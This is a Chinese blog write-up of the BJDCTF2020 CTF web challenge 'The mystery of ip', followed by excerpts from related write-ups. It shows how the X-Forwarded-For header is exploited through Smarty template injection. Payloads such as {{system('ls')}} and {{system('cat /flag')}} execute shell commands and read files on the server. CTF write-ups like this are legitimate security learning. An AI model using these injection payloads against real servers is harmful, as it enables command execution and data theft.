[BJDCTF2020]The mystery of ip

最新推荐文章于 2025-03-06 15:27:21 发布
最新推荐文章于 2025-03-06 15:27:21 发布
阅读量463 收藏 1
点赞数
分类专栏: buu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/missht0/article/details/113142007
版权
本文记录了BJDCTF2020比赛中名为The mystery of ip挑战的解决过程,通过X-Forwarded-for头部尝试进行ssti注入攻击,最终尝试获取flag文件。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

[BJDCTF2020]The mystery of ip

在这里插入图片描述
hint的源码里面有这句话
在这里插入图片描述
flag里面显示的是ip地址,那么就可以猜测是xff注入
bp里试一下

X-Forwarded-for:text

在这里插入图片描述
这种输什么回显什么的可以猜测ssti注入

X-Forwarded-for:{{system('ls')}}

在这里插入图片描述

X-Forwarded-for:{{system('cat /flag.php')}}

在这里插入图片描述
看来不是这个

X-Forwarded-for:{{system('ls ../../../../..')}}

在这里插入图片描述

X-Forwarded-for:{{system('cat /flag')}}

在这里插入图片描述

【学习笔记 37】 buu [BJDCTF2020]The mystery of ip
weixin_43553654的博客
08-01 437
0x00 知识点 tplmap探测是否存在模板注入漏洞 smartly模板注入 0x01 知识点详解 tplmap的使用方法? 答:这里只用到python tplmap.py -u 'curl',想了解详情的话这里附上一篇大佬的博客。 什么是smartly模板引擎注入? 答:这里参考这篇文章 解题思路 打开网站一看 就看到了他提示的flag,那还不点开看看 提示到了我的IP,这一瞬间就让我想到了http的请求头里的XXF参数和Client-ip参数,想了解http请求头详情的请去看我的上一篇文
buuctf-[BJDCTF2020]The mystery of ip
qq_42728977的博客
12-23 1517
[BJDCTF2020]The mystery of ip考点复现参考 考点 模板注入 复现 看到提示,说是怎么知道我的ip,那就说明应该是该请求头,然后模板注入,然后发现果然是。 在请求头加入X-Forwarded-For: GET /flag.php HTTP/1.1 Host: node4.buuoj.cn:28006 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0 A
[BJDCTF2020]The mystery of ip wp
最新发布
2303_80867263的博客
03-06 168
xff注入,php模板注入
[BJDCTF2020]The mystery of ip(ssti模板注入题目)
m0_55109452的博客
06-02 2014
项目场景: 链接http://node3.buuoj.cn:29669/index.php 问题描述: 观察页面找到三个链接,点开flag和hint看看,发现flag那个页面窃取了客户端的ip地址,这题的题目是“The mystery of ipIP的神秘,看来解题是要从这里入手了。 尝试解决: 既然是窃取了IP,考虑是不是XFF或Client-IP这两个header,发现这个IP确实可控,0.0,感觉可以冲了 我想到的第一个就是之前看到的sql注入的http头注入,但是也只是想想罢了,再看看其他方
[bjdctf2020]the mystery of ip
03-16
这是一道关于IP地址的谜题,需要我们了解IP地址的基本知识和相关的网络协议。通过分析题目中给出的IP地址和端口号,我们可以推测出这是一道关于TCP/IP协议的题目。我们需要使用Wireshark等网络抓包工具来捕获网络...
【学习笔记 38】 buu [BJDCTF2020]The mystery of ip
weixin_43553654的博客
08-01 331
0x00 知识点 base_convert函数的利用 bin2hex和hex2bin函数 代码审计 0x01 知识点详解 base_convert函数的作用? 答:base_convert() 函数在任意进制之间转换数字。 bin2hex和hex2bin函数的作用? 答:hex2bin() 函数把十六进制值的字符串转换为 ASCII 字符。 bin2hex() 函数把 ASCII 字符的字符串转换为十六进制值。字符串可通过使用 pack() 函数再转换回去。 0x02 解题思路 1.打开网站就直接看
BUUCTF:[BJDCTF2020]The mystery of ip
末初 - mochu7
04-18 972
https://buuoj.cn/challenges#[BJDCTF2020]The%20mystery%20of%20ip 回显了IP,在hint.php有提示Do you know why i know your ip? 尝试修改X-Forwarded-For 猜测这里可能是SSTI,输入{{7*7}} 确定了是SSTI,尝试{{config}} 看报错发现这里应该是PHP的一种比较老的引擎Smarty 查看版本 {$smarty.version} 版本是:3.1.34-dev-7 查
BUUCTF-web类-[BJDCTF2020]The mystery of ip
weixin_44622228的博客
04-19 1668
BUUCTF-web类-[BJDCTF2020]The mystery of ip 这是一道很有意思的题目。 靶机首页 有Flag和Hint按钮,查看Flag试试 发现有我们本机IP的回显,很有可能是http请求头中有XFF信息将我们ip一起带过去了,我们先试试伪造XFF头看看情况。 发现确实是会变化,第一步猜想有没有可能是XFF注入? 我简单了在xff后面加了单引号,也在sqlmap上跑了一下,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值